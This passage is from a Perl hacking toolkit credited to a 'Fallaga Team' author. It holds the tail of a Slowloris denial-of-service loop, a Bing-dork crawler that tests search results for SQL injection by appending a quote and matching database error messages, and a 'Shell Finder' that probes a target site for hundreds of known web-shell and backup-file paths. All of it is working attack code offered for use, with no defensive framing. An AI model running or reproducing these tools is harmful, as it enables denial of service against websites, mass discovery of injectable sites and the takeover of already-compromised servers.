2816.                if ( $working[$z] == 1 ) {
2817.                    if ($cache) {
2818.                        $rand = "?" . int( rand(99999999999999) );
2819.                    }
2820.                    else {
2821.                        $rand = "";
2822.                    }
2823.                    my $primarypayload =
2824.                        "$method /$rand HTTP/1.1\r\n"
2825.                      . "Host: $sendhost\r\n"
2826.                      . "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\r\n"
2827.                      . "Content-Length: 42\r\n";
2828.                    my $handle = $sock[$z];
2829.                    if ($handle) {
2830.                        print $handle "$primarypayload";
2831.                        if ( $SIG{__WARN__} ) {
2832.                            $working[$z] = 0;
2833.                            close $handle;
2834.                            $failed++;
2835.                            $failedconnections++;
2836.                        }
2837.                        else {
2838.                            $packetcount++;
2839.                            $working[$z] = 1;
2840.                        }
2841.                    }
2842.                    else {
2843.                        $working[$z] = 0;
2844.                        $failed++;
2845.                        $failedconnections++;
2846.                    }
2847.                }
2848.                else {
2849.                    $working[$z] = 0;
2850.                    $failed++;
2851.                    $failedconnections++;
2852.                }
2853.            }
2854.        }
2855.        print "\t\tSending data.\n";
2856.        foreach my $z ( 1 .. $num ) {
2857.            if ( $working[$z] == 1 ) {
2858.                if ( $sock[$z] ) {
2859.                    my $handle = $sock[$z];
2860.                    if ( print $handle "X-a: b\r\n" ) {
2861.                        $working[$z] = 1;
2862.                        $packetcount++;
2863.                    }
2864.                    else {
2865.                        $working[$z] = 0;
2866.                        #debugging info
2867.                        $failed++;
2868.                        $failedconnections++;
2869.                    }
2870.                }
2871.                else {
2872.                    $working[$z] = 0;
2873.                    #debugging info
2874.                    $failed++;
2875.                    $failedconnections++;
2876.                }
2877.            }
2878.        }
2879.        print
2880. "Current stats:\tSlowloris has now sent $packetcount packets successfully.\nThis thread now sleeping for $timeout seconds...\n\n";
2881.        sleep($timeout);
2882.    }
2883. }
2884.  
2885.  
2886. sub domultithreading {
2887.    my ($num) = @_;
2888.    my @thrs;
2889.    my $i                    = 0;
2890.    my $connectionsperthread = 50;
2891.    while ( $i < $num ) {
2892.        $thrs[$i] =
2893.          threads->create( \&doconnections, $connectionsperthread, 1 );
2894.        $i += $connectionsperthread;
2895.    }
2896.    my @threadslist = threads->list();
2897.    while ( $#threadslist > 0 ) {
2898.        $failed = 0;
2899. }}
2900. }}
2901. if($targett eq '3')
2902. {
2903. system('cls');
2904. system('title Dorker Bing');
2905.                    {
2906. use strict;
2907. use warnings;
2908. use HTTP::Request;
2909. use LWP::UserAgent;
2910.  
2911. ###############
2912. my $dork;
2913. my $url;
2914. my $i;
2915. my $request;
2916. my $useragent;
2917. my $response;
2918. my $start;
2919. my $end;
2920. my $result;
2921. my $fl;
2922. my $link;
2923. my $req;
2924. my $ua;
2925. my $result2;
2926. my $res;
2927. my $save;
2928. my $pages;
2929. my $page;
2930. my $choice;
2931. ##############
2932. my @z;
2933.  
2934. print q{
2935. ################################
2936. ##      / SQLi Crawler /      ##
2937. ##       Fallaga Team       ##
2938. ##   ~ReCoded by Fallag crx~    ##
2939. ################################
2940.  
2941. };
2942.  
2943. MainMenu:
2944.  
2945. print "------------------------\n";
2946. print "Enter [1] To Begin SQLi.\n";
2947. print "Enter [2] To Exit.\n";
2948. print "------------------------\n\n";
2949. print "Your Choice: ";
2950.  
2951. chomp ($choice = <STDIN>);
2952. print "\n";
2953.  
2954. if ($choice eq 1) {&sql_scan}
2955. if ($choice eq 5) {die;}
2956.  
2957. sub sql_scan
2958. {
2959.  
2960. print "[+] Enter Bing! dork: ";
2961. chomp ($dork = <STDIN>);
2962. print "\n";
2963. print "[+] How Many Pages To Leech?: ";
2964. chomp ($pages = <STDIN>);
2965. print "\n";
2966.  
2967. $page = $pages.'1';
2968.  
2969. print "[~] Crawling...\n\n";
2970.  
2971. for ($i = 0; $i <= $page; $i=$i+11)
2972. {
2973.  
2974. $url = "http://www.bing.com/search?q=$dork&go=&qs=n&sk=&sc=8-13&first=$i";
2975.  
2976. $request = HTTP::Request->new(GET => $url);
2977. $useragent = LWP::UserAgent->new();
2978. $response = $useragent->request($request);
2979. $result = $response->content;
2980.  
2981. $start = '<h3><a href="';
2982. $end = '" onmousedown=';
2983.  
2984. while ($result =~ m/$start(.*?)$end/g)
2985.  
2986. {
2987.      $fl = $1;
2988.      $link = $fl."%27";
2989.      $req = HTTP::Request->new(GET => $link);
2990.      $ua = LWP::UserAgent->new();
2991.      $res = $ua->request($req);
2992.      $result2 = $res->content;
2993.  
2994.       if ($result2=~ m/You have an error in your SQL syntax/i || $result2=~ m/Query failed/i || $result2=~ m/SQL query failed/i || $result2=~ m/mysql_fetch_/i || $result2=~ m/mysql_fetch_array/i || $result2 =~ m/mysql_num_rows/i || $result2 =~ m/The used SELECT statements have a different number of columns/i )
2995.       {
2996.         push @z, $link;
2997.         print "[+] MySQL Vulnerable: $link\n\n";
2998.       }
2999.  
3000.       elsif ($result2 =~ m/Microsoft JET Database/i || $result2 =~ m/ODBC Microsoft Access Driver/i )
3001.       {
3002.         push @z, $link;
3003.         print "[+] MsSQL Vulnerable: $link\n\n";
3004.       }
3005.  
3006.       else {
3007.  
3008.             print "[-] $link <- Not Vulnerable\n\n";
3009.       }
3010. }
3011.  
3012. }
3013.     print "Vulnerable Links:\n";
3014.     print "-----------------------------------\n";
3015. foreach (@z)
3016. {
3017.     print "$_ \n\n";
3018. }
3019. print "Save Into A Text File? (Y or N): ";
3020. chomp ($save = <STDIN>);
3021.  
3022. if ($save eq 'Y')
3023. {
3024.     print "Saving File...\n\n";
3025.     open(vuln_file, ">>Vulns.txt");
3026.     foreach (@z)
3027.     {
3028.         print vuln_file "$_ \n";
3029.     }
3030.     close(vuln_file);
3031.     print "File Saved!\n\n";
3032. }
3033. goto MainMenu;
3034. }}
3035. }
3036. if($targett eq '1')
3037. {
3038. system('cls');
3039. system('title Dir Finder');
3040.                    {
3041.                        print " Shell Finder \n";
3042. use HTTP::Request;
3043. use LWP::UserAgent;
3044.  
3045. system('cls');
3046. system('title Dir Finder Rec0ded by Fallag crx');
3047. print"\n";
3048. print  "\t>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n";
3049. print "\t>                              Shell Finder                        >\n";
3050. print "\t>                          C0ded by Fallag crx                        >\n";
3051. print "\t>                           Fallaga Team                          >\n";
3052. print "\t>                          Result In Done.txt                       >\n";
3053. print  "\t>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n";
3054. print "\n";
3055.  
3056. print " Scan Your site Site\n\n Example: www.victim.com \n\n-> ";
3057.  
3058.  
3059. $site=<STDIN>;
3060. chomp $site;
3061.  
3062. if($site !~ /http:\/\//) { $site = "http://$site/"; };
3063.  
3064. print "\n";
3065.  
3066. @path =  ('WSO.php','dz.php','w.php','wp-content/plugins/akismet/akismet.php','images/stories/w.php','w.php','shell.php','cpanel.php','cpn.php','sql.php','mysql.php','config. ​ php','configuration.php','madspot.php','Cgishell.pl','killer.php','changeall.php ​ ','2.php','Sh3ll.php','dz0.php','dam.php','user.php','dom.php','whmcs.php','r00t ​ .php','1.php','a.php','r0k.php','abc.php','egy.php','syrian_shell.php','xxx.php' &#8203; ,'settings.php','tmp.php','cyber.php','c99.php','r57.php','404.php','gaza.php',' ​ 1.php','d4rk.php','index1.php','nkr.php','xd.php','M4r0c.php','Dz.php','sniper.p ​ hp','ksa.php','v4team.php','offline.php','priv8.php','911.php','madspotshell.php ​ ','c100.php','sym.php','cp.php','tmp/cpn.php','tmp/w.php','tmp/r57.php','tmp/king.php','tmp/sok.php','tmp/ss.php','tmp/as.php','tmp/dz.php','tmp/r1z.php','tmp/whmcs.php','tmp/root.php','tmp/r00t.php','templates/beez/index.php','templates/beez/beez.php','templates/rhuk_milkyway/index.php','tmp/uploads.php','tmp/upload.php','tmp/sa.php','sa.php','readme.php','tmp/readme.php','wp.zip'.'wp-content/plugins/disqus-comment-system/disqus.php',
3067. 'd0mains.php','wp-content/plugins/akismet/akismet.php','madspotshell.php','info.php','egyshell.php','Sym.php','c22.php','c ​100.php',
3068. 'wp-content/plugins/akismet/admin.php#','configuration.php','g.php','wp-content/plugins/google-sitemap-generator/sitemap-core.php#',
3069. 'wp-content/plugins/akismet/widget.php#','xx.pl','ls.php','Cpanel.php','k.php','zone-h.php','tmp/user.php','tmp/Sym.php','cp.php',
3070. 'tmp/madspotshell.php','tmp/root.php','tmp/whmcs.php','tmp/index.php','tmp/2.php','tmp/dz.php','tmp/cpn.php',
3071. 'tmp/changeall.php','tmp/Cgishell.pl','tmp/sql.php','0day.php','tmp/admin.php','cliente/downloads/h4xor.php',
3072. 'whmcs/downloads/dz.php','L3b.php','d.php','tmp/d.php','tmp/L3b.php','wp-content/plugins/akismet/admin.php',
3073. 'templates/rhuk_milkyway/index.php','templates/beez/index.php','sado.php','admin1.php','upload.php','up.php','vb.zip','vb.rar',
3074. 'admin2.asp','uploads.php','sa.php','sysadmins/','admin1/','sniper.php','administration/Sym.php','images/Sym.php',
3075. '/r57.php','/wp-content/plugins/disqus-comment-system/disqus.php','gzaa_spysl','sql-new.php','/shell.php','/sa.php','/admin.php',
3076. '/sa2.php','/2.php','/gaza.php','/up.php','/upload.php','/uploads.php','/templates/beez/index.php','shell.php','/amad.php',
3077. '/t00.php','/dz.php','/site.rar','/Black.php','/site.tar.gz','/home.zip','/home.rar','/home.tar','/home.tar.gz',
3078. '/forum.zip','/forum.rar','/forum.tar','/forum.tar.gz','/test.txt','/ftp.txt','/user.txt','/site.txt','/error_log','/error',
3079. '/cpanel','/awstats','/site.sql','/vb.sql','/forum.sql','r00t-s3c.php','c.php','/backup.sql','/back.sql','/data.sql','wp.rar/',
3080. 'wp-content/plugins/disqus-comment-system/disqus.php','asp.aspx','/templates/beez/index.php','tmp/vaga.php',
3081. 'tmp/killer.php','whmcs.php','abuhlail.php','tmp/killer.php','tmp/domaine.pl','tmp/domaine.php','useradmin/',
3082. 'tmp/d0maine.php','d0maine.php','tmp/sql.php','X.php','123.php','m.php','b.php','up.php','tmp/dz1.php','dz1.php','forum.zip','Symlink.php','Symlink.pl',
3083. 'forum.rar','joomla.zip','joomla.rar','wp.php','buck.sql','sysadmin.php','images​/c99.php', 'xd.php', 'c100.php',
3084. 'spy.aspx','xd.php','tmp/xd.php','sym/root/home/','billing/killer.php','tmp/upload.php','tmp/admin.php',
3085. 'Server.php','tmp/uploads.php','tmp/up.php','Server/','wp-admin/c99.php','tmp/priv8.php','priv8.php','cgi.pl/',
3086. 'tmp/cgi.pl','downloads/dom.php','templates/ja-helio-farsi/index.php','webadmin.html','admins.php',
3087. '/wp-content/plugins/count-per-day/js/yc/d00.php','bluff.php','king.jeen','admins/','admins.asp','admins.php','wp.zip','/wp-content/plugins/disqus-comment-system/WSO.php',
3088. '/wp-content/plugins/disqus-comment-system/dz.php',
3089. '/wp-content/plugins/disqus-comment-system/DZ.php',
3090. '/wp-content/plugins/disqus-comment-system/cpanel.php',
3091. '/wp-content/plugins/disqus-comment-system/cpn.php',
3092. '/wp-content/plugins/disqus-comment-system/sos.php',
3093. '/wp-content/plugins/disqus-comment-system/term.php',
3094. '/wp-content/plugins/disqus-comment-system/Sec-War.php',
3095. '/wp-content/plugins/disqus-comment-system/sql.php',
3096. '/wp-content/plugins/disqus-comment-system/ssl.php',
3097. '/wp-content/plugins/disqus-comment-system/mysql.php',
3098. '/wp-content/plugins/disqus-comment-system/WolF.php',
3099. '/wp-content/plugins/disqus-comment-system/madspot.php',
3100. '/wp-content/plugins/disqus-comment-system/Cgishell.pl',
3101. '/wp-content/plugins/disqus-comment-system/killer.php',
3102. '/wp-content/plugins/disqus-comment-system/changeall.php',
3103. '/wp-content/plugins/disqus-comment-system/2.php',
3104. '/wp-content/plugins/disqus-comment-system/Sh3ll.php',
3105. '/wp-content/plugins/disqus-comment-system/dz0.php',
3106. '/wp-content/plugins/disqus-comment-system/dam.php',
3107. '/wp-content/plugins/disqus-comment-system/user.php',
3108. '/wp-content/plugins/disqus-comment-system/dom.php',
3109. '/wp-content/plugins/disqus-comment-system/whmcs.php',
3110. '/wp-content/plugins/disqus-comment-system/vb.zip',
3111. '/wp-content/plugins/disqus-comment-system/r00t.php',
3112. '/wp-content/plugins/disqus-comment-system/c99.php',
3113. '/wp-content/plugins/disqus-comment-system/gaza.php',
3114. '/wp-content/plugins/disqus-comment-system/1.php',
3115. '/wp-content/plugins/disqus-comment-system/d0mains.php',
3116. '/wp-content/plugins/disqus-comment-system/madspotshell.php',
3117. '/wp-content/plugins/disqus-comment-system/info.php',
3118. '/wp-content/plugins/disqus-comment-system/egyshell.php',
3119. '/wp-content/plugins/disqus-comment-system/Sym.php',
3120. '/wp-content/plugins/disqus-comment-system/c22.php',
3121. '/wp-content/plugins/disqus-comment-system/c100.php',
3122. '/wp-content/plugins/disqus-comment-system/configuration.php',
3123. '/wp-content/plugins/disqus-comment-system/g.php',
3124. '/wp-content/plugins/disqus-comment-system/xx.pl',
3125. '/wp-content/plugins/disqus-comment-system/ls.php',
3126. '/wp-content/plugins/disqus-comment-system/Cpanel.php',
3127. '/wp-content/plugins/disqus-comment-system/k.php',
3128. '/wp-content/plugins/disqus-comment-system/zone-h.php',
3129. '/wp-content/plugins/disqus-comment-system/tmp/user.php',
3130. '/wp-content/plugins/disqus-comment-system/tmp/Sym.php',
3131. '/wp-content/plugins/disqus-comment-system/cp.php',
3132. '/wp-content/plugins/disqus-comment-system/tmp/madspotshell.php',
3133. '/wp-content/plugins/disqus-comment-system/tmp/root.php',
3134. '/wp-content/plugins/disqus-comment-system/tmp/whmcs.php',
3135. '/wp-content/plugins/disqus-comment-system/tmp/index.php',
3136. '/wp-content/plugins/disqus-comment-system/tmp/2.php',
3137. '/wp-content/plugins/disqus-comment-system/tmp/dz.php',
3138. '/wp-content/plugins/disqus-comment-system/tmp/cpn.php',
3139. '/wp-content/plugins/disqus-comment-system/tmp/changeall.php',
3140. '/wp-content/plugins/disqus-comment-system/tmp/Cgishell.pl',
3141. '/wp-content/plugins/disqus-comment-system/tmp/sql.php',
3142. '/wp-content/plugins/disqus-comment-system/0day.php',
3143. '/wp-content/plugins/disqus-comment-system/tmp/admin.php',
3144. '/wp-content/plugins/disqus-comment-system/L3b.php',
3145. '/wp-content/plugins/disqus-comment-system/d.php',
3146. '/wp-content/plugins/disqus-comment-system/tmp/d.php',
3147. '/wp-content/plugins/disqus-comment-system/tmp/L3b.php',
3148. '/wp-content/plugins/disqus-comment-system/sado.php',
3149. '/wp-content/plugins/disqus-comment-system/admin1.php',
3150. '/wp-content/plugins/disqus-comment-system/upload.php',
3151. '/wp-content/plugins/disqus-comment-system/up.php',
3152. '/wp-content/plugins/disqus-comment-system/vb.zip',
3153. '/wp-content/plugins/disqus-comment-system/vb.rar',
3154. '/wp-content/plugins/disqus-comment-system/admin2.asp',
3155. '/wp-content/plugins/disqus-comment-system/uploads.php',
3156. '/wp-content/plugins/disqus-comment-system/sa.php',
3157. '/wp-content/plugins/disqus-comment-system/sysadmins/',
3158. '/wp-content/plugins/disqus-comment-system/admin1/',
3159. '/wp-content/plugins/disqus-comment-system/sniper.php',
3160. '/wp-content/plugins/disqus-comment-system/images/Sym.php',
3161. '/wp-content/plugins/disqus-comment-system//r57.php',
3162. '/wp-content/plugins/disqus-comment-system/gzaa_spysl',
3163. '/wp-content/plugins/disqus-comment-system/sql-new.php',
3164. '/wp-content/plugins/disqus-comment-system//shell.php',
3165. '/wp-content/plugins/disqus-comment-system//sa.php',
3166. '/wp-content/plugins/disqus-comment-system//admin.php',
3167. '/wp-content/plugins/disqus-comment-system//sa2.php',
3168. '/wp-content/plugins/disqus-comment-system//2.php',
3169. '/wp-content/plugins/disqus-comment-system//gaza.php',
3170. '/wp-content/plugins/disqus-comment-system//up.php',
3171. '/wp-content/plugins/disqus-comment-system//upload.php',
3172. '/wp-content/plugins/disqus-comment-system//uploads.php',
3173. '/wp-content/plugins/disqus-comment-system/shell.php',
3174. '/wp-content/plugins/disqus-comment-system//amad.php',
3175. '/wp-content/plugins/disqus-comment-system//t00.php',
3176. 'pwp-content/plugins/disqus-comment-system/disqus.php',
3177. 'wp-content/plugins/akismet/WSO.php',
3178. 'wp-content/plugins/akismet/dz.php',
3179. 'wp-content/plugins/akismet/DZ.php',
3180. 'wp-content/plugins/akismet/cpanel.php',
3181. 'wp-content/plugins/akismet/cpn.php',
3182. 'wp-content/plugins/akismet/sos.php',
3183. 'wp-content/plugins/akismet/term.php',
3184. 'wp-content/plugins/akismet/Sec-War.php',
3185. 'wp-content/plugins/akismet/sql.php',
3186. 'wp-content/plugins/akismet/ssl.php',
3187. 'wp-content/plugins/akismet/mysql.php',
3188. 'wp-content/plugins/akismet/WolF.php',
3189. 'wp-content/plugins/akismet/madspot.php',
3190. 'wp-content/plugins/akismet/Cgishell.pl',
3191. 'wp-content/plugins/akismet/killer.php',
3192. 'wp-content/plugins/akismet/changeall.php',
3193. 'wp-content/plugins/akismet/2.php',
3194. 'wp-content/plugins/akismet/Sh3ll.php',
3195. 'wp-content/plugins/akismet/dz0.php',
3196. 'wp-content/plugins/akismet/dam.php',
3197. 'wp-content/plugins/akismet/user.php',
3198. 'wp-content/plugins/akismet/dom.php',
3199. 'wp-content/plugins/akismet/whmcs.php',
3200. 'wp-content/plugins/akismet/vb.zip',
3201. 'wp-content/plugins/akismet/r00t.php',
3202. 'wp-content/plugins/akismet/c99.php',
3203. 'wp-content/plugins/akismet/gaza.php',
3204. 'wp-content/plugins/akismet/1.php',
3205. 'wp-content/plugins/akismet/d0mains.php',
3206. 'wp-content/plugins/akismet/madspotshell.php',
3207. 'wp-content/plugins/akismet/info.php',
3208. 'wp-content/plugins/akismet/egyshell.php',
3209. 'wp-content/plugins/akismet/Sym.php',
3210. 'wp-content/plugins/akismet/c22.php',
3211. 'wp-content/plugins/akismet/c100.php',
3212. 'wp-content/plugins/akismet/configuration.php',
3213. 'wp-content/plugins/akismet/g.php',
3214. 'wp-content/plugins/akismet/xx.pl',
3215. 'wp-content/plugins/akismet/ls.php',
3216. 'wp-content/plugins/akismet/Cpanel.php',
3217. 'wp-content/plugins/akismet/k.php',
3218. 'wp-content/plugins/akismet/zone-h.php',
3219. 'wp-content/plugins/akismet/tmp/user.php',
3220. 'wp-content/plugins/akismet/tmp/Sym.php',
3221. 'wp-content/plugins/akismet/cp.php',
3222. 'wp-content/plugins/akismet/tmp/madspotshell.php',
3223. 'wp-content/plugins/akismet/tmp/root.php',
3224. 'wp-content/plugins/akismet/tmp/whmcs.php',
3225. 'wp-content/plugins/akismet/tmp/index.php',
3226. 'wp-content/plugins/akismet/tmp/2.php',
3227. 'wp-content/plugins/akismet/tmp/dz.php',
3228. 'wp-content/plugins/akismet/tmp/cpn.php',
3229. 'wp-content/plugins/akismet/tmp/changeall.php',
3230. 'wp-content/plugins/akismet/tmp/Cgishell.pl',
3231. 'wp-content/plugins/akismet/tmp/sql.php',
3232. 'wp-content/plugins/akismet/0day.php',
3233. 'wp-content/plugins/akismet/tmp/admin.php',
3234. 'wp-content/plugins/akismet/L3b.php',
3235. 'wp-content/plugins/akismet/d.php',
3236. 'wp-content/plugins/akismet/tmp/d.php',
3237. 'wp-content/plugins/akismet/tmp/L3b.php',
3238. 'wp-content/plugins/akismet/sado.php',
3239. 'wp-content/plugins/akismet/admin1.php',
3240. 'wp-content/plugins/akismet/upload.php',
3241. 'wp-content/plugins/akismet/up.php',
3242. 'wp-content/plugins/akismet/vb.zip',
3243. 'wp-content/plugins/akismet/vb.rar',
3244. 'wp-content/plugins/akismet/admin2.asp',
3245. 'wp-content/plugins/akismet/uploads.php',
3246. 'wp-content/plugins/akismet/sa.php',
3247. 'wp-content/plugins/akismet/sysadmins/',
3248. 'wp-content/plugins/akismet/admin1/',
3249. 'wp-content/plugins/akismet/sniper.php',
3250. 'wp-content/plugins/akismet/images/Sym.php',
3251. 'wp-content/plugins/akismet//r57.php',
3252. 'wp-content/plugins/akismet/gzaa_spysl',
3253. 'wp-content/plugins/akismet/sql-new.php',
3254. 'wp-content/plugins/akismet//shell.php',
3255. 'wp-content/plugins/akismet//sa.php',
3256. 'wp-content/plugins/akismet//admin.php',
3257. 'wp-content/plugins/akismet//sa2.php',
3258. 'wp-content/plugins/akismet//2.php',
3259. 'wp-content/plugins/akismet//gaza.php',
3260. 'wp-content/plugins/akismet//up.php',
3261. 'wp-content/plugins/akismet//upload.php',
3262. 'wp-content/plugins/akismet//uploads.php',
3263. 'wp-content/plugins/akismet/shell.php',
3264. 'wp-content/plugins/akismet//amad.php',
3265. 'wp-content/plugins/akismet//t00.php',
3266. 'wp-content/plugins/akismet//dz.php',
3267. 'wp-content/plugins/akismet//site.rar',
3268. 'wp-content/plugins/akismet//Black.php',
3269. 'wp-content/plugins/akismet//site.tar.gz',
3270. 'wp-content/plugins/akismet//home.zip',
3271. 'wp-content/plugins/akismet//home.rar',
3272. 'wp-content/plugins/akismet//home.tar',
3273. 'wp-content/plugins/akismet//home.tar.gz',
3274. 'wp-content/plugins/akismet//forum.zip',
3275. 'wp-content/plugins/akismet//forum.rar',
3276. 'wp-content/plugins/akismet//forum.tar',
3277. 'wp-content/plugins/akismet//forum.tar.gz',
3278. 'wp-content/plugins/akismet//test.txt',
3279. 'wp-content/plugins/akismet//ftp.txt',
3280. 'wp-content/plugins/akismet//user.txt',
3281. 'wp-content/plugins/akismet//site.txt',
3282. 'wp-content/plugins/akismet//error_log',
3283. 'wp-content/plugins/akismet//error',
3284. 'wp-content/plugins/akismet//cpanel',
3285. 'wp-content/plugins/akismet//awstats',
3286. 'wp-content/plugins/akismet//site.sql',
3287. 'wp-content/plugins/akismet//vb.sql',
3288. 'wp-content/plugins/akismet//forum.sql',
3289. 'wp-content/plugins/akismet/r00t-s3c.php',
3290. 'wp-content/plugins/akismet/c.php',
3291. 'wp-content/plugins/akismet//backup.sql',
3292. 'wp-content/plugins/akismet//back.sql',
3293. 'wp-content/plugins/akismet//data.sql',
3294. 'wp-content/plugins/akismet/wp.rar/',
3295. 'wp-content/plugins/akismet/asp.aspx',
3296. 'wp-content/plugins/akismet/tmp/vaga.php',
3297. 'wp-content/plugins/akismet/tmp/killer.php',
3298. 'wp-content/plugins/akismet/whmcs.php',
3299. 'wp-content/plugins/akismet/abuhlail.php',
3300. 'wp-content/plugins/akismet/tmp/killer.php',
3301. 'wp-content/plugins/akismet/tmp/domaine.pl',
3302. 'wp-content/plugins/akismet/tmp/domaine.php',
3303. 'wp-content/plugins/akismet/useradmin/',
3304. 'wp-content/plugins/akismet/tmp/d0maine.php',
3305. 'wp-content/plugins/akismet/d0maine.php',
3306. 'wp-content/plugins/akismet/tmp/sql.php',
3307. 'wp-content/plugins/akismet/X.php',
3308. 'wp-content/plugins/akismet/123.php',
3309. 'wp-content/plugins/akismet/m.php',
3310. 'wp-content/plugins/akismet/b.php',
3311. 'wp-content/plugins/akismet/up.php',
3312. 'wp-content/plugins/akismet/tmp/dz1.php',
3313. 'wp-content/plugins/akismet/dz1.php',
3314. 'wp-content/plugins/akismet/forum.zip',
3315. 'wp-content/plugins/akismet/Symlink.php',
3316. 'wp-content/plugins/akismet/Symlink.pl',
3317. 'wp-content/plugins/akismet/forum.rar',
3318. 'wp-content/plugins/akismet/joomla.zip',
3319. 'wp-content/plugins/akismet/joomla.rar',
3320. 'wp-content/plugins/akismet/wp.php',
3321. 'wp-content/plugins/akismet/buck.sql',
3322. 'wp-content/plugins/akismet/sysadmin.php',
3323. 'wp-content/plugins/akismet/images/c99.php',
3324. 'wp-content/plugins/akismet/xd.php',
3325. 'wp-content/plugins/akismet/c100.php',
3326. 'wp-content/plugins/akismet/spy.aspx',
3327. 'wp-content/plugins/akismet/xd.php',
3328. 'wp-content/plugins/akismet/tmp/xd.php',
3329. 'wp-content/plugins/akismet/sym/root/home/',
3330. 'wp-content/plugins/akismet/billing/killer.php',
3331. 'wp-content/plugins/akismet/tmp/upload.php',
3332. 'wp-content/plugins/akismet/tmp/admin.php',
3333. 'wp-content/plugins/akismet/Server.php',
3334. 'wp-content/plugins/akismet/tmp/uploads.php',
3335. 'wp-content/plugins/akismet/tmp/up.php',
3336. 'wp-content/plugins/akismet/Server/',
3337. 'wp-content/plugins/akismet/wp-admin/c99.php',
3338. 'wp-content/plugins/akismet/tmp/priv8.php',
3339. 'wp-content/plugins/akismet/priv8.php',
3340. 'wp-content/plugins/akismet/cgi.pl/',
3341. 'wp-content/plugins/akismet/tmp/cgi.pl',
3342. 'wp-content/plugins/akismet/downloads/dom.php',
3343. 'wp-content/plugins/akismet/webadmin.html',
3344. 'wp-content/plugins/akismet/admins.php',
3345. 'wp-content/plugins/akismet/bluff.php',
3346. 'wp-content/plugins/akismet/king.jeen',
3347. 'wp-content/plugins/akismet/admins/',
3348. 'wp-content/plugins/akismet/admins.asp',
3349. 'wp-content/plugins/akismet/admins.php',
3350. 'wp-content/plugins/akismet/wp.zip',
3351. 'wp-content/plugins/akismet/disqus.php',
3352. 'wp-content/plugins/google-sitemap-generator//cpanel',
3353. 'wp-content/plugins/google-sitemap-generator//awstats',
3354. 'wp-content/plugins/google-sitemap-generator//site.sql',
3355. 'wp-content/plugins/google-sitemap-generator//vb.sql',
3356. 'wp-content/plugins/google-sitemap-generator//forum.sql',
3357. 'wp-content/plugins/google-sitemap-generator/r00t-s3c.php',
3358. 'wp-content/plugins/google-sitemap-generator/c.php',
3359. 'wp-content/plugins/google-sitemap-generator//backup.sql',
3360. 'wp-content/plugins/google-sitemap-generator//back.sql',
3361. 'wp-content/plugins/google-sitemap-generator//data.sql',
3362. 'wp-content/plugins/google-sitemap-generator/wp.rar/',
3363. 'wp-content/plugins/google-sitemap-generator/asp.aspx',
3364. 'wp-content/plugins/google-sitemap-generator/tmp/vaga.php',
3365. 'wp-content/plugins/google-sitemap-generator/tmp/killer.php',
3366. 'wp-content/plugins/google-sitemap-generator/whmcs.php',
3367. 'wp-content/plugins/google-sitemap-generator/abuhlail.php',
3368. 'wp-content/plugins/google-sitemap-generator/tmp/killer.php',
3369. 'wp-content/plugins/google-sitemap-generator/tmp/domaine.pl',
3370. 'wp-content/plugins/google-sitemap-generator/tmp/domaine.php',
3371. 'wp-content/plugins/google-sitemap-generator/useradmin/',
3372. 'wp-content/plugins/google-sitemap-generator/tmp/d0maine.php',
3373. 'wp-content/plugins/google-sitemap-generator/d0maine.php',
3374. 'wp-content/plugins/google-sitemap-generator/tmp/sql.php',
3375. 'wp-content/plugins/google-sitemap-generator/X.php',
3376. 'wp-content/plugins/google-sitemap-generator/123.php',
3377. 'wp-content/plugins/google-sitemap-generator/m.php',
3378. 'wp-content/plugins/google-sitemap-generator/b.php',
3379. 'wp-content/plugins/google-sitemap-generator/up.php',
3380. 'wp-content/plugins/google-sitemap-generator/tmp/dz1.php',
3381. 'wp-content/plugins/google-sitemap-generator/dz1.php',
3382. 'wp-content/plugins/google-sitemap-generator/forum.zip',
3383. 'wp-content/plugins/google-sitemap-generator/Symlink.php',
3384. 'wp-content/plugins/google-sitemap-generator/Symlink.pl',
3385. 'wp-content/plugins/google-sitemap-generator/forum.rar',
3386. 'wp-content/plugins/google-sitemap-generator/joomla.zip',
3387. 'wp-content/plugins/google-sitemap-generator/joomla.rar',
3388. 'wp-content/plugins/google-sitemap-generator/wp.php',
3389. 'wp-content/plugins/google-sitemap-generator/buck.sql',
3390. 'wp-content/plugins/google-sitemap-generator/sysadmin.php',
3391. 'wp-content/plugins/google-sitemap-generator/images/c99.php',
3392. 'wp-content/plugins/google-sitemap-generator/xd.php',
3393. 'wp-content/plugins/google-sitemap-generator/c100.php',
3394. 'wp-content/plugins/google-sitemap-generator/spy.aspx',
3395. 'wp-content/plugins/google-sitemap-generator/xd.php',
3396. 'wp-content/plugins/google-sitemap-generator/tmp/xd.php',
3397. 'wp-content/plugins/google-sitemap-generator/sym/root/home/',
3398. 'wp-content/plugins/google-sitemap-generator/billing/killer.php',
3399. 'wp-content/plugins/google-sitemap-generator/tmp/upload.php',
3400. 'wp-content/plugins/google-sitemap-generator/tmp/admin.php',
3401. 'wp-content/plugins/google-sitemap-generator/Server.php',
3402. 'wp-content/plugins/google-sitemap-generator/tmp/uploads.php',
3403. 'wp-content/plugins/google-sitemap-generator/tmp/up.php',
3404. 'wp-content/plugins/google-sitemap-generator/Server/',
3405. 'wp-content/plugins/google-sitemap-generator/wp-admin/c99.php',
3406. 'wp-content/plugins/google-sitemap-generator/tmp/priv8.php',
3407. 'wp-content/plugins/google-sitemap-generator/priv8.php',
3408. 'wp-content/plugins/google-sitemap-generator/cgi.pl/',
3409. 'wp-content/plugins/google-sitemap-generator/tmp/cgi.pl',
3410. 'wp-content/plugins/google-sitemap-generator/downloads/dom.php',
3411. 'wp-content/plugins/google-sitemap-generator/webadmin.html',
3412. 'wp-content/plugins/google-sitemap-generator/admins.php',
3413. 'wp-content/plugins/google-sitemap-generator/bluff.php',
3414. 'wp-content/plugins/google-sitemap-generator/king.jeen',
3415. 'wp-content/plugins/google-sitemap-generator/admins/',
3416. 'wp-content/plugins/google-sitemap-generator/admins.asp',
3417. 'wp-content/plugins/google-sitemap-generator/admins.php',
3418. 'wp-content/plugins/google-sitemap-generator/wp.zip',
3419. 'wp-content/plugins/google-sitemap-generator/sitemap-core.php',
3420. '/templates/beez/WSO.php',
3421. '/templates/beez/dz.php',
3422. '/templates/beez/DZ.php',
3423. '/templates/beez/cpanel.php',
3424. '/templates/beez/cpn.php',
3425. '/templates/beez/sos.php',
